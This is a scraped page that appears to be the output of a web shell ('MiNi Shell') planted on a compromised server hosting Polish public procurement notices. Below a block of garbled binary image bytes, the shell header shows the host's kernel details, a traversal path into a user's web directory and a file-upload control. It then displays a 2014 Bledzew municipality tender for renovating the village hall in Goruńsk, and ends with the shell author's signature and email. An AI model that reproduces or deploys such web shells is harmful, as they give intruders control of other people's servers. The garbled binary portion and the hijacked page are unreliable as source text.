JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141120/381984-N-2014.html

<p class="kh_header"><b>Bledzew: Remont świetlicy Wiejskiej w Goruńsku</b><br>
<b>Numer ogłoszenia: 381984 - 2014; data zamieszczenia: 20.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Bledzew , ul. Kościuszki 16, 66-350 Bledzew, woj. lubuskie, tel. 095 743 66 10, faks 095 743 66 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bledzew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy Wiejskiej w Goruńsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ROBOTY  ROZBIÓRKOWE
 odbicie tynków  zewnętrznych z zaprawy cementowej na ścianach , filarach , pilastrach  o pow. odbicia do 5 m2                                                                                  406,335 m2,
 wykucie z muru ościeżnic  drewnianych  o pow.  do 1 m2                           szt. 1
 wykucie z muru ościeżnic  drewnianych o pow. do 2,0 m2                          szt. 12,
 wykucie z mury ościeżnic drewnianych o pow. ponad 2,0 m2                     59,42 m2,
 wykucie z muru podokienników  betonowych z lastryko                              22,0 m,
 wykucie  z muru ościeżnic  stalowych, krat okiennych o pow. ponad 2,0 m2 - 12,335 m2,
 rozebranie  rynien z blachy  nie nadającej się do użytku                                61,50 m,
 rozebranie rur spustowych  z  blachy nie nadającej się do użytku                 36,40 m,
 rozebranie obróbek blacharskich  z murów ogniowych , okapów itp. nie nadających się  do użytku                                                                                        26,625 m2,
 wywiezienie samochodem  gruzu samowyładowczymi  rozbiórki konstrukcji  ceglanej  na odległość  do 1 km                                                                       9,231 m3,
 wywiezienie gruzu samochodami samowyładowczymi  konstrukcji rozebranych - za każdy  nast. 1 km , krotność  4                                                                  9,231 m3,
 rozebranie  obróbek z parapetów  zewnętrznych  z blachy ocynkowanej          5,863 m2,
 zerwanie posadzki z płytek  lastrykowych na zaprawie cementowej              26,106 m2,

OCIEPLENIE BUDYNKU STYROPIANEM  GRUBOŚCI 15 CM 
 przygotowanie starego  podłoża pod ocieplenie metoda lekką -mokrą oczyszczenie mechaniczne   i zmycie                                                              406,335 m2,
 przygotowanie  starego podłoża  pod  ocieplenie  metodą lekka - mokrą  jednokrotne  gruntowanie emulsją ATLAS UNI GRUNT                            406,335 m2
 ocieplenie ścian  budynków płytami styropianowymi - system STROPTER  przyklejenie płyt styropianowych do ścian                                                     384,73 m2,
 ocieplenie ścian   budynków  płytami styropianowymi - system STROPTER przyklejenie płyt styropianowych       do ścian cokołu                                    24,45 m2,
 ocieplenie  ścian  budynków płytami styropianowymi - system STROPTER przyklejenie płyt styropianowych     do ościeży                                                27,06 m2,
  ocieplenie  ścian  budynków płytami styropianowymi - system STROPTER przyklejenie płyt styropianowych     za pomocą dybli plastikowych  do  ścian  z cegły                                                                                              2455,08 szt.
  ocieplenie  ścian  budynków płytami styropianowymi - system STROPTER przyklejenie płyt styropianowych     przyklejenie  warstwy siatki na ścianach 409,18 m2,
 ocieplenie  ścian  budynków płytami styropianowymi - system STROPTER przyklejenie płyt styropianowych   przyklejenie  warstwy siatki na ościeżach 27,06 m2
 ocieplenie  ścian  budynków płytami styropianowymi - system STROPTER ochrona  narożników wypukłych kątowników  metalowych                         204,54 m,
  ocieplenie  ścian  budynków płytami styropianowymi - system STROPTER zamocowanie  listwy cokołowej                                                                  97,80 m,
wyprawa elewacyjna  cienkowarstwowa z tynku mineralnego ATLAS  CERMIT DR 20  lub SN 20  grub. 2 mm wykonana ręcznie  na uprzednio przygotowanym podłożu - nałożenie masy tynkarskie                                                                              436,24 m2,
wyprawa  elewacyjna  cienkowarstwowa z akrylowych tynków dekoral  ATLAS CERMIT N 200 o fakturze  nakrapianej lub R 200 o fakturze rustykalnej  gryb. 3 mm wyk. ręcznie na uprzednio przyg. podłoże  ościeża                                       440,715 m2,
 rusztowania zewnętrzne  rurowe o wysk. do 10 m                                        466,62 m2,
 obsadzenie prefabrykowanych podokienników  dł. do 0,75 m                            8,0 szt.,
 obsadzenie   prefabrykowanych  podokienników  dł ponad 1,15 m                4,0 szt.,
 obsadzenie  prefabrykowanych  podokienników dł. ponad 1,45 m                 5,0 szt.,
obsadzenie prefabrykowanych  podokienników  dł 4,45 m                              1 szt.   
 licowanie płytami  klinkierowymi o wymiarach 25x12 cm ościeży                9,153 m2,
obsadzenie prefabrykowanych podokienników dł. 2,9 m                                  1 szt.,

STOLARKA  OKIENNA I DRZWIOWA
 montaż okien rozwieralnych i uchylno rozwieralnych  jednodzielnych z PCV z obróbką  obsadzenia  o pow.  do 1,5 m2                                                        61,794 m2,
 skrzydła drzwiowe płytowe  wewnętrzne pełne  jednoskrzydłowe fabrycznie wykończone                                                                                                     15,99 m2,
 montaż  drzwi z PCV z obróbką  obsadzenia jednoskrzydłowe zewnętrzne  2,31 m2
 montaż  drzwi z PCV z obróbka obsadzenia dwuskrzydłowe zewnętrzne - 7,92 m2
 montaż drzwi z PCV z obróbką obsadzenia dwuskrzydłowe wewnętrzne 31,68 m2,
 drzwi stalowe pełne o pow. ponad 2 m2                                                     2,10 m2,

OCIEPLENIE STROPODACHU STYROPIANEM  GRUBOŚCI  15  CM 
 docieplenie ścian piwnic  płytami polistyrenowych ( styropianowymi) mocowanie punktowo w technologii firmy  
DEITERMANN  grub. 15 cm   457,575 m2,
 ocieplenie  ścian budynków  płytami styropianowymi system STOPTER przymocowanie  płyt styropianowych za pomocą dybli plastikowych do ścian z gazobetonu    grub.15 cm                                                                1830,30 szt.,
 naprawa pokryć dachowych papa termozgrzewalną - jednokrotnie pokrycie papą wierzchniego  krycia                                                                          469,305 m2,
 naprawa pokryć dachowych  papą termozgrzewalna -obróbki z papy wierzchniego krycia                                                                                    10,115 m2,
obróbki  przy szer. w rozwinięciu  ponad 25 cm  z blachy  stalowej ocynkowanej 41,229 m2,
 rynny dachowe półokrągłe ośr. 15 cm  z blach stalowej ocynkowanej   63,10 m.,
 rury spustowe okrągłe  ośr. 132 cm z blachy stalowej  ocynkowanej    35,00 m,
INSTALACJA ODGROMOWA 
 zwody poziome płaskie wykonywane przewodem stalowym o śr. do 10 mm na dachu betonowym  krytym papą                                                              136,70 m,
 przewody  odprowadzające na ścianach  ceglanych                             23,00m, 

SCHODY  ZEWNĘTRZNE
 okładziny schodów  z płytek o wymiarach 30x30 cm  układanych metodą kombinowaną                                                                                       26,106 m2,
 cokoliki z płytek  o wymiarach 30x30 cm wysokość  cokolika  równej 15 cm - 12,0 m,
 warstwy wyrównawcze i wygładzające - grunt dyspersyjny                  26,106 m2,
  kraty stałe stalowe  prętowe o pow. ponad 2,0 m2 osadzone w ścianach - 10,235 m2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca wnosi wadium w wysokości 6.000,00  zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać uprawnienia do działalności zgodnie z wymaganiami ustawowymi,
posiadać uprawnienia do wykonywania czynności objętych zamówieniem zgodnie z wymaganiami ustawowymi w tym względzie i dysponować osobami posiadającymi odpowiednie kwalifikacje budowlane 
Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonał w okresie ostatnich pięciu lat (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) 
co najmniej dwie roboty budowlane obejmujące swoim zakresem łącznie wykonanie docieplenia budynków 
o łącznej powierzchni nie mniejszej niż 1200 m2
Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować pracownikami technicznymi, 
kierownikiem budowy  posiadającym  uprawnienia  konstrukcyjno - budowlane w pełnym  zakresie  z aktualnym wpisem  członka  właściwej izby samorządu  zawodowego  załączając kopię uprawnień  budowlanych ,
kierownikiem  robót  elektrycznych  posiadającego uprawnienia do nadzorowania robót elektrycznych z aktualnym wpisem  członka właściwej  izby samorządu zawodowego, załączając kopię   uprawnień budowlanych 
Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdować się w sytuacji finansowej i ekonomicznej gwarantującej wykonanie robót 
w ustalonym terminie, w tym względzie posiadać własne lub dostęp do środków finansowych zapewniających ciągłość wykonywania robót, w wysokości nie mniejszej niż cena ofertowa,
opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500 000,00 zł (słownie: pięćset tysięcy złotych).
Ocena spełniania warunków będzie dokonywana na zasadzie: spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kosztorys  ofertowy opracowany metodą uproszczoną - na podstawie dokumentów wymienionych 
w punkcie 3 w dziale III SIWZ oraz: wskaźniki kalkulacyjne jest: stawka roboczogodziny, koszty pośrednie, koszty zakupu, zysk.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminów wskazanych w niniejszej specyfikacji i umowie może nastąpić wyłącznie w drodze pisemnego aneksu pod rygorem nieważności w przypadku wstrzymania robót lub przerwy w wykonywaniu przedmiotu umowy powstałych z przyczyn zawinionych przez Zamawiającego oraz z powodu działania siły wyższej, w tym wystąpienia warunków pogodowych uniemożliwiających wykonywanie prac budowlanych, np. mróz, intensywne opady śniegu, deszczu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bledzew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bledzew
ul. Kościuszki 16
66 -350 Bledzew
pokój nr 6 lub na stronie www.bip.bledzew.pl w zakładce przetargi aktualne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2014 godzina 09:00, miejsce: Sekretariat (parter) Urzędu Gminy Bledzew, ul. Kościuszki 16, 66-350 Bledzew.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach działania Odnowa i rozwój wsi w ramach Programu Oś 4 Leader, działania 413 Wdrożenie lokalnych strategii rozwoju.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com